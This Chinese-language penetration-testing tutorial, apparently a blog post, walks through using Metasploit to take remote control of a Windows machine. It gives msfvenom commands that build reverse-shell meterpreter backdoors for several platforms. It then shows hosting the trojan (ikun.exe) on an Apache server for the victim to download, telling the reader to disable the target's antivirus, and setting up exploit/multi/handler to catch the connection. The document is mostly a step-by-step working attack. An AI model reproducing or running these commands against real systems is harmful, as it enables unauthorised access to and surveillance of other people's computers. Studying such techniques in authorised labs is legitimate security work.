一、获取shell权限
1.简介
针对windows操作系统的渗透测试
操作过程概况:利用msf生成一个后台木马,使用exploit/multi/handler模块,通过对方打开的形式获取权限,可以进入后渗透对目标进行监听等操作。
2.MsfVenom介绍
首先msf就是Metaaploit,venom就是病毒。
msfvenom是msfpayload和msfencode的组合。将这两个工具集成在一个框架实例中。进一步来说,msfvenom是用来生成后门的软件,在目标机上执行后门,在本地监听上线。
3.kali生成木马文件,靶机获取:
3.1:后台木马生成
windows可执行程序后门:msfvenom-p windows/meterpreter/reverse tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe
Linux可执行程序后门:msfvenom-p linux/x64/meterpreter/reverse tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf
php脚本后门: msfvenom -p php/meterpreter/reverse tcp LHOST =<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php
python脚本后门:msfvenom-p python/meterpreter/reverse tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.py
在这使用Windos可执行程序后门
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.115.4 LPORT=1145 -f exe -o /var/www/html/ikun.exe
参数解释
- payload:windows/meterpreter/reverse_tcp 系统/结构/作用方式
- lhost : 监听地址
- lport:监听端口
- -o 在指定路径下生成文件
注意在代码中LHOST:192.168.115.4与LPORT:1145要根据实际情况来更改

3.2 在靶机上获取到木马文件
方法一:通过Apache开启网站访问服务上传木马文件,靶机访问后获取
(上面的生成木马文件的指令已经指定了shell.exe生成在网页根目录下)
1.开启apache将木马上传到网页上,然后windows以访问网页的形式下载木马
service apache2 restart //重启apache服务
访问渗透机出现以下后面就成功了,如果没有就说明没有安装apache服务

靶机访问kali创建的网站,我这里是:192.168.115.4,获取ikun.exe文件
即:192.168.115.4/ikun.exe
注意:需要把Windows自带的杀毒软件关了,否则会删掉我们的木马文件

4. 使用模块use exploit/multi/handler,配置参数
msfconsole
use exploit/multi/handler //使用模块
set PAYLOAD windows/x64/meterpreter/reverse_tcp //设置payload
set LHOST 192.168.115.4 //设置192.168.115.4进行监听
set LPORT 1145 //监听端口为1145
开始攻击:输入run
在靶机上打开ikun.exe
返回kali输入getuid可获得靶机用户名






Comments NOTHING